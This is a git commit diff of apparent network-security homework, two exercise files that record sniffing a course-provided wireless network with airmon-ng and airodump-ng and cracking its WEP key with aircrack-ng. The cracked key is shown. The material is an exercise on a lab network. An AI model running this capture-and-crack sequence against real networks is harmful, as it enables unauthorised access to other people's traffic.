aboutsummaryrefslogtreecommitdiff
path: root/netsec-assignment2-S4498062/exercise2
diff options
context:
space:
mode:
Diffstat (limited to 'netsec-assignment2-S4498062/exercise2')
-rw-r--r--netsec-assignment2-S4498062/exercise2/exercise2a22
-rw-r--r--netsec-assignment2-S4498062/exercise2/exercise2b8
2 files changed, 30 insertions, 0 deletions
diff --git a/netsec-assignment2-S4498062/exercise2/exercise2a b/netsec-assignment2-S4498062/exercise2/exercise2a
new file mode 100644
index 0000000..d076017
--- /dev/null
+++ b/netsec-assignment2-S4498062/exercise2/exercise2a
@@ -0,0 +1,22 @@
+ # service NetworkManager stop
+ # airmon-ng start wlan0
+ # airodump-ng mon0
+
+We see the following networks (the target is marked with a +):
+
+ ESSID BSSID CH
+ eduroam
+ ru-guest
+ eduroam-config
+ + NetSec Homework Net (Pol) 48:5B:39:89:8C:10 1
+
+And the clients:
+
+ BSSID STATION PWR Rate Lost Frames Probe
+ 48:5B:39:89:8C:10 00:0F:C9:0C:EE:ED -63 24 -54 96 1410
+ 48:5B:39:89:8C:10 00:0F:C9:0C:F7:8C -65 48 -54 95 960
+ 48:5B:39:89:8C:10 00:0F:C9:0C:F7:93 -71 54 -54 158 1479
+
+The MAC addresses all start with the same 35 bits, so either they were made by
+the same vendor or they were changed manually.
+
diff --git a/netsec-assignment2-S4498062/exercise2/exercise2b b/netsec-assignment2-S4498062/exercise2/exercise2b
new file mode 100644
index 0000000..5c2cc9c
--- /dev/null
+++ b/netsec-assignment2-S4498062/exercise2/exercise2b
@@ -0,0 +1,8 @@
+# airodump-ng -c 1 --bssid 48:5B:39:89:8C:10 -w outputnetsec mon0
+# aircrack-ng --bssid 48:5B:39:89:8C:10 outputnetsec-01.cap
+
+ [..]
+
+ KEY FOUND! [ 37:00:9C:49:21:61:1E:4A:1A:44:6E:2F:20 ]
+ Decrypted correctly: 100%
+